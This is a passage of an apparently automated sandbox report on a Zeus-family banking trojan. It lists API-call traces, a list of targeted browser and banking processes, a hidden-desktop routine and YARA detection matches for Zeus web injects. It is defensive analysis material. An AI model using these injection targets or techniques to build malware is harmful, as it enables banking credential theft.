trIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,
GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe2_2_02BC1900
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_006A78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_006A1900
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014E78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe 6_2_014E1900
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_014D3610
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BB95B0

System Summary

Source: 0.2.OjKmJJm2YT.exe.406400.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
